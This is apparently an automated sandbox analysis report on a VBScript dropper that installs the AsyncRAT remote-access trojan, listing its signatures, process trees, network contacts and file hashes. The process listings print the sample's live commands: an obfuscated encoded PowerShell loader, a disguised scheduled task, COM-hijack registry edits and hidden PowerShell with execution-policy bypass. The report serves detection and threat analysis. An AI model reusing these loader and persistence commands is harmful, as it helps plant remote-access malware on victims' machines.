Malware Analysis Report

2024-11-30 19:25

Sample ID 240923-t1x9kswfnd
Target #9948-8465.vbs
SHA256 da6181e22c0c7230058044b36945666bd5cb6eef577eed273f217b166335e1b4
Tags
execution asyncrat sasa agilenet discovery persistence privilege_escalation rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

da6181e22c0c7230058044b36945666bd5cb6eef577eed273f217b166335e1b4

Threat Level: Known bad

The file #9948-8465.vbs was found to be: Known bad.

Malicious Activity Summary

execution asyncrat sasa agilenet discovery persistence privilege_escalation rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Event Triggered Execution: Component Object Model Hijacking

Checks computer location settings

Obfuscated with Agile.Net obfuscator

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies registry key

Scheduled Task/Job: Scheduled Task

Suspicious use of SetWindowsHookEx

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-23 16:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-23 16:32

Reported

2024-09-23 16:34

Platform

win7-20240708-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\#9948-8465.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\#9948-8465.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $bwrdjyvaostknlmeqfzc = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SUV4KCBOZVctb2JKZUNUICBpTy5DT21wcmVTU2lvTi5kZWZsYVRFc1RSZUFtKFtpby5NZU1vUllzdFJFYU1dW2NvTlZlUlRdOjpmcm9tYkFzZTY0c1RyaU5HKCAnelZwYmJ1c2dFTjBLUXYxSUZLa2JpS0oySDFGVzB1dTlseGhzQTJZZVo0RHEzbzllWW9hWk0wOWc3SThmdC81Ym5IdmNuUHU0T0hkMTdoNUdhV0tiUEo0czFmeTY5RmJPNzdOTFdIalpaeDc3NkZhc3Y5NXpjWUh1a2pGN1pPTmJKVGd0WEtVVUNFaEpFVnd1b2VDZkVWOFBQU2d0U0VCdkFRbzgxOHJRa1pSYVdjRkxhd0ZzdVdQaVF2LzBOLzkyK3ZmUFcxLy9UT2hmWVcxNC92M21mdzFFR1I4ZkdLKy9GNzlUUmVZNTNlTFh1VHlJL0d1RjVEKytEa0ZSV0h6KzhrVmd4YUR6L3ZPeUFReENTaWpSOTJIWjYxRENQd3U1eStiQlhmck9xMFN4S3AxbW8vUGZuS0tFMTZyeVZ3azZZM1ppdFM0NWducDVSQ3NscGcwVkNuQnQ4UnV2a2tQU0wzQzQ1OVplemhaSXc2V0lDb0t3K3VFTXEvSTQxOUVySkJ6RE1oa3F1QUpaTkVPbnRVb3hOYmRTU3lYV3M2eDFzczVrU05sY0h3NUd4V2F5dHkwaWVCWDB3T0lmSk5vQXFXQVVhdzFSeW1tdHlMRTJHVUxvQUZod25rT3VieUZ1eE1Tc1dCTHFVNVdJYkJHZzgzdU1LbURjMGRyWVFDanJLY1lkMUFzSVJiYXV5OVViTTlVbUVsQkVieUlTRzVpWG5ENkt6TWtzb3M3dE1mc011TlVLT3NMeDJUU0V5Z3hTSkZLWk82b3NWMFVaY2tSdk1JdmIxWW1KT1IrYVE4VHFiWXlkYWRaWXhSa01TUysxZmxJUUt6S0p5MGIxc1ZjQ21qamIyU1YxTUpjREFkNjBBZ2trUTQxQXNnU2E4YTZuTVhNcktaQ3lya3hXTlRwNng0RDNHUFEwWmIvZkhSbllhVEVKaitBNEpWelJ2eWNZQ2tJbzEzWnN2UVVTMUtOQlpxaDBmWllyZ3Bxc0xkQmx0U2tDTzlXQzNrTmlIV1dOSG1IQUZzRC9lSXlCU3BWd2tCbllGK1J5RzVHbkRnUE9IUEdQeFgxVmZvSmxDcjI5bXE1RHdQVVRPbFVtbzBIb0FTOWhlUTEzeUtUNjJRWXNiVEpRN0hQMi9xTVdmRk1KbWFBZTlybGlqQm1HblBwRVlBb0szSHpWYzNYdzk3NjZ5QVRLUFZRc3RpeHRlS291b3kyKzdxTm5aN2xXR0pkR3o5MllwM1JRdDZFbUJFai9HS29PMUVVem1YMktjelY3Y2ZGTDB3T3gzcmIydjZQdUZzSmhqVVBDRGRYMHRvM2NGbjNEU2lUZW85QmVCbVJxTURKUHcvRnBXRzJRc0c5VVlkclpZRGgwTnlhd1dHblEwQml6KzgyOGFzOWdMTlpKYWpqb2pVSEhPN1RtVUcra0tSZHRwbkt6MSt4UnVpVkM1b290OTBob0hmcFUwSmxMWENQSGxTNzBUYnRqSEUwNTNJazNXZnd1blAzM0Y2ZG1RSVRoWXdqREtZTjhFUTNjVUhneTVHc0dxTHAydnR1aWgyQnYxL2cxREZNd29KQ0VOK0FCdEpSanVVMXI1NGVHTlBKdWNYWkRxdmVJWGVYZWxPK1RxcUtLWXVySXFmRnVFR1JOK2t4UkVmeGlLSFM4RmVBcUE4V0R3V24vMG9MVkZJQkNJNEdLZVIweTRMVVE0cS9yUS9EemNTVDBaNjF2d3M4MGtYTmZZN0dpbi9KTmJMbTY0NVd6VUFKS0JyWnZiaXJsbU9tNEhqeFRBN1YyUkcreGtBMGZ0ay96OW9aZ1RaTkMxOHlPVGNmenNQZDlJRlc0endFQkhsL2dFbWp0TE1MSlZITDdkNUFGQU42NThPQ3plUFlMJyApLCBbSU8uQ29NcHJlU1Npb04uQ09NcHJFc3Npb25tT0RFXTo6RGVDT01wUkVzUyl8JSB7TmVXLW9iSmVDVCAgc3lTVEVtLklPLnNUUkVhTXJlYWRFUigkXyxbVEVYVC5FTkNPZGluR106OmFTQ2lJKX0gfCV7JF8uUmVhRFRPRW5EKCl9ICk='));powershell $bwrdjyvaostknlmeqfzc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www1.coulmandental.com udp
US 34.192.83.212:443 www1.coulmandental.com tcp
US 34.192.83.212:443 www1.coulmandental.com tcp

Files

memory/1928-4-0x000007FEF600E000-0x000007FEF600F000-memory.dmp

memory/1928-8-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/1928-7-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/1928-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

memory/1928-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/1928-9-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 cf67f54747f6115a33ccd24e5ca67024
SHA1 f8a204b8e2c5da2f9491c53ffe81964a44801845
SHA256 b3dff38da8b6b9a0004bf8ad869b379e91e855c504fec7c9ae393dd930d9d033
SHA512 7514323ee20709664e81dcf9c932728bcea4d1ef0fc0dbb93f712e3b31c63299d9d4441adb3e2848cd8d3996b7198ec8ac83dda826d02a35e84cc09a92a588f1

memory/1928-10-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/1928-12-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/1928-17-0x000007FEF600E000-0x000007FEF600F000-memory.dmp

memory/1928-18-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/1928-19-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-23 16:32

Reported

2024-09-23 16:34

Platform

win10v2004-20240802-en

Max time kernel

140s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\#9948-8465.vbs"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4556 wrote to memory of 4056 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 4056 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4056 wrote to memory of 4840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4056 wrote to memory of 4840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4840 wrote to memory of 2304 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 4840 wrote to memory of 2304 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1848 wrote to memory of 1892 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1848 wrote to memory of 1892 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1892 wrote to memory of 4652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1892 wrote to memory of 4652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1892 wrote to memory of 1416 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1892 wrote to memory of 1416 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 1892 wrote to memory of 624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 624 wrote to memory of 744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 624 wrote to memory of 744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 744 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 744 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 744 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 744 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\#9948-8465.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $bwrdjyvaostknlmeqfzc = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SUV4KCBOZVctb2JKZUNUICBpTy5DT21wcmVTU2lvTi5kZWZsYVRFc1RSZUFtKFtpby5NZU1vUllzdFJFYU1dW2NvTlZlUlRdOjpmcm9tYkFzZTY0c1RyaU5HKCAnelZwYmJ1c2dFTjBLUXYxSUZLa2JpS0oySDFGVzB1dTlseGhzQTJZZVo0RHEzbzllWW9hWk0wOWc3SThmdC81Ym5IdmNuUHU0T0hkMTdoNUdhV0tiUEo0czFmeTY5RmJPNzdOTFdIalpaeDc3NkZhc3Y5NXpjWUh1a2pGN1pPTmJKVGd0WEtVVUNFaEpFVnd1b2VDZkVWOFBQU2d0U0VCdkFRbzgxOHJRa1pSYVdjRkxhd0ZzdVdQaVF2LzBOLzkyK3ZmUFcxLy9UT2hmWVcxNC92M21mdzFFR1I4ZkdLKy9GNzlUUmVZNTNlTFh1VHlJL0d1RjVEKytEa0ZSV0h6KzhrVmd4YUR6L3ZPeUFReENTaWpSOTJIWjYxRENQd3U1eStiQlhmck9xMFN4S3AxbW8vUGZuS0tFMTZyeVZ3azZZM1ppdFM0NWducDVSQ3NscGcwVkNuQnQ4UnV2a2tQU0wzQzQ1OVplemhaSXc2V0lDb0t3K3VFTXEvSTQxOUVySkJ6RE1oa3F1QUpaTkVPbnRVb3hOYmRTU3lYV3M2eDFzczVrU05sY0h3NUd4V2F5dHkwaWVCWDB3T0lmSk5vQXFXQVVhdzFSeW1tdHlMRTJHVUxvQUZod25rT3VieUZ1eE1Tc1dCTHFVNVdJYkJHZzgzdU1LbURjMGRyWVFDanJLY1lkMUFzSVJiYXV5OVViTTlVbUVsQkVieUlTRzVpWG5ENkt6TWtzb3M3dE1mc011TlVLT3NMeDJUU0V5Z3hTSkZLWk82b3NWMFVaY2tSdk1JdmIxWW1KT1IrYVE4VHFiWXlkYWRaWXhSa01TUysxZmxJUUt6S0p5MGIxc1ZjQ21qamIyU1YxTUpjREFkNjBBZ2trUTQxQXNnU2E4YTZuTVhNcktaQ3lya3hXTlRwNng0RDNHUFEwWmIvZkhSbllhVEVKaitBNEpWelJ2eWNZQ2tJbzEzWnN2UVVTMUtOQlpxaDBmWllyZ3Bxc0xkQmx0U2tDTzlXQzNrTmlIV1dOSG1IQUZzRC9lSXlCU3BWd2tCbllGK1J5RzVHbkRnUE9IUEdQeFgxVmZvSmxDcjI5bXE1RHdQVVRPbFVtbzBIb0FTOWhlUTEzeUtUNjJRWXNiVEpRN0hQMi9xTVdmRk1KbWFBZTlybGlqQm1HblBwRVlBb0szSHpWYzNYdzk3NjZ5QVRLUFZRc3RpeHRlS291b3kyKzdxTm5aN2xXR0pkR3o5MllwM1JRdDZFbUJFai9HS29PMUVVem1YMktjelY3Y2ZGTDB3T3gzcmIydjZQdUZzSmhqVVBDRGRYMHRvM2NGbjNEU2lUZW85QmVCbVJxTURKUHcvRnBXRzJRc0c5VVlkclpZRGgwTnlhd1dHblEwQml6KzgyOGFzOWdMTlpKYWpqb2pVSEhPN1RtVUcra0tSZHRwbkt6MSt4UnVpVkM1b290OTBob0hmcFUwSmxMWENQSGxTNzBUYnRqSEUwNTNJazNXZnd1blAzM0Y2ZG1RSVRoWXdqREtZTjhFUTNjVUhneTVHc0dxTHAydnR1aWgyQnYxL2cxREZNd29KQ0VOK0FCdEpSanVVMXI1NGVHTlBKdWNYWkRxdmVJWGVYZWxPK1RxcUtLWXVySXFmRnVFR1JOK2t4UkVmeGlLSFM4RmVBcUE4V0R3V24vMG9MVkZJQkNJNEdLZVIweTRMVVE0cS9yUS9EemNTVDBaNjF2d3M4MGtYTmZZN0dpbi9KTmJMbTY0NVd6VUFKS0JyWnZiaXJsbU9tNEhqeFRBN1YyUkcreGtBMGZ0ay96OW9aZ1RaTkMxOHlPVGNmenNQZDlJRlc0endFQkhsL2dFbWp0TE1MSlZITDdkNUFGQU42NThPQ3plUFlMJyApLCBbSU8uQ29NcHJlU1Npb04uQ09NcHJFc3Npb25tT0RFXTo6RGVDT01wUkVzUyl8JSB7TmVXLW9iSmVDVCAgc3lTVEVtLklPLnNUUkVhTXJlYWRFUigkXyxbVEVYVC5FTkNPZGluR106OmFTQ2lJKX0gfCV7JF8uUmVhRFRPRW5EKCl9ICk='));powershell $bwrdjyvaostknlmeqfzc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f

C:\Windows\system32\cmd.exe

cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 www1.coulmandental.com udp
US 34.192.83.212:443 www1.coulmandental.com tcp
US 8.8.8.8:53 212.83.192.34.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 35.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 88.119.175.153:5555 tcp
US 8.8.8.8:53 153.175.119.88.in-addr.arpa udp
US 88.119.175.153:8808 tcp

Files

memory/4056-0-0x00007FF89DB63000-0x00007FF89DB65000-memory.dmp

memory/4056-1-0x0000024F99C30000-0x0000024F99C52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l0mtfbmy.v4c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4056-11-0x00007FF89DB60000-0x00007FF89E621000-memory.dmp

memory/4056-12-0x00007FF89DB60000-0x00007FF89E621000-memory.dmp

memory/4056-22-0x00007FF89DB63000-0x00007FF89DB65000-memory.dmp

memory/4056-23-0x00007FF89DB60000-0x00007FF89E621000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0ff7e1af4cc86e108eef582452b35523
SHA1 c2ccf2811d56c3a3a58dced2b07f95076c6b5b96
SHA256 62ed8ef2250f9f744852cb67df0286c80f94e26aed646989b76e5b78f2f1f0d0
SHA512 374675fd36cd8bc38acaec44d4cc855b85feece548d99616496d498e61e943fd695fec7c57550a58a32455e8b21b41bafa18cd1dadac69676fff1de1a56da937

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8d089c855358969266a3275f0ec4f955
SHA1 5ce30b598cfa0c2008541b1b549673401971dc3d
SHA256 e198883dc78657f44bae11e2de5f56bc0f41eb6440f73cd3d65c30878b858734
